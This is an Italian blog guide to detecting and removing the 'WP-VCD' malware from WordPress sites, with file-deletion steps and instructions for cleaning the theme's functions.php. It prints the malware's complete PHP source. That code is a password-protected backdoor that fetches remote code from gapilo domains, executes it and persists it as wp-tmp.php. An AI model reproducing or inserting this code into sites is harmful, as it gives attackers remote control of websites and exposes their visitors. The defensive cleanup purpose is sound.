Come rimuovere malware “VCD” da WordPress

Malware

Stai navigando sul tuo sito e se clicchi ovunque si aprono dei pop-up o pubblicità ? Mi dispiace per te ma hai preso un malware.  Segui la mia guida così potrai risparmiare un sacco di soldi ed è veramente facile rimuovere questo malware.

Quali cartelle o file “colpisce” Questo malware?

Questo malware colpisce la cartella wp-includes e il file functions.php del proprio tema.  Questa backdoor “prende il controllo” di wordpress dal file functions. Questo script malevolo fa in modo che l’ utente quando visita il sito,che magari clicca su qualcosa, Si aprono pagine e pagine di pubblicità indesiderata.

Come controllo il mio sito?

Guarda è facile! Per prima cosa accedi al tuo pannello di controllo dell’ hosting (Plesk,cPanel,Webmin,DirectAdmin,eccc..) oppure accedi ai tuoi file trammite FTP (usa qualsiasi software per ftp ad esempio Filezilla). Vai nella cartella dove è installato wordpess(dipende dal hosting ma di solito è public_html, httpdocs, nomesito, ecc…), Adesso vai su WP-INCLUDES  poi scorri tutti i file e se trovi i file: ” wp-feed.php” , “wp-tmp.php” e ” wp-vcd.php”  vuol dire che hai preso il malware. Un’ altro controllo da fare è quello di andare su WP-CONTENT/THEMES/NOMEDELTEMA e aprire il file functions.php.  Se nelle prime righe di codice ti trovi questo:

<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘1f501615e985a65b627398d427c88767’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{ ecc…ec…

Vuol dire che il malware ti ha colpito. Ma stai tranquillo! Adesso ti spiegherò la modalità per rimuovere questo malware.

Come rimuovo il malware?

Innanzitutto devi eliminare i file: “wp-feed.php“, “wp-tmp.php” e ” wp-vcd.php” dalla cartella wp-Includes. Adesso il passaggio sucessivo è molto importante! Una volta eliminato i file vai sulla cartella wp-content poi su theme e clicca sul nome del tuo tema(ad. esempio: enfold,betheme,ecc). Appena hai aperto la cartella cerca il file functions.php, aprilo o scaricalo(dipende dal pannello di controllo, certi pannelli hanno un editor, se il tuo non c’ è l’ ha scarica il file e una volta modificato caricalo di nuovo). Aprilo con un qualsiasi editor ed elimina le righe da <?php a ?>. Dopo di questo simbolo: ?> c’ è un altro <?php (QUESTO NON DEVI ELIMINARLO!) DOPO QUESTO INIZIA IL CODICE COMMENTATO DEL TEMA(i commenti sono quelli che iniziano con //).

Clicca qui per vedere dove eliminare il codice malevolo

In poche parole devi eliminare dalla prima riga fino dove trovi ?> (NON QUELLO A FONDO PAGINA!)

Se hai seguito questa procedura sei riuscito a rimuovere il malware dal tuo sito! Se non riesci a farlo oppure hai paura di creare qualche danno contattami subito e io ti aiuterò oppure ti toglierò il malware (Ovviamente il tutto è gratuito).

Una volta fatto ciò installa un buon antivirus nel tuo sito. Installa wordfence(clicca qui)

Ecco il codice completo del malware(Possono cambiare solo le key e basta)

<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘1f501615e985a65b627398d427c88767’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{

case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code\.php/i’,$file,$matcholddomain))
{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}

}
}
}
break;

case ‘change_code’;
if (isset($_REQUEST[‘newcode’]))
{

if (!empty($_REQUEST[‘newcode’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i’,$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[‘newcode’]), $file);
@file_put_contents(__FILE__, $file);
print “true”;
}

}
}
}
break;

default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}

die(“”);
}

$div_code_name = “wp_vcd”;
$funcfile = __FILE__;
if(!function_exists(‘theme_temp_setup’)) {
$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
if( fwrite($handle, “<?php\n” . $phpCode))
{
}
else
{
$tmpfname = tempnam(‘./’, “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key=’671f55202565d8b7050045e7ae0d758c’;
if (($tmpcontent = @file_get_contents(“http://www.gapilo.com/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.gapilo.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents(“http://www.gapilo.pw/code.php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents(“http://www.gapilo.top/code.php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}

}
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
?>

Ultimi post
WordPress-security
Giugno 8, 2020|BY NicolaInstallare WordPress in 4 semplici Step

Prima di iniziare a leggere l’ articolo ti consiglio di dare una letta a questi...

Security
Ottobre 28, 2019|BY NicolaIl malware WP-VCD è tornato ad attaccare WordPress

C'è un nuovo malware per i siti wordpress chiamato: wp-vcd, al contrario della versione precedente;...

Nicola Reat
Agosto 9, 2018|BY NicolaAbilitare SSH all’utente root in Debian

Hai installato Debian ma non ti funziona ssh con l' utente root? Questo articolo fa...

Certificato-ssl-wordpress
Giugno 13, 2018|BY NicolaWordPress: Come installare un certificato SSL

Hai comprato un certificato ssl oppure il tuo hosting te lo "offre" ma non sai...

19 commenti
Write a comment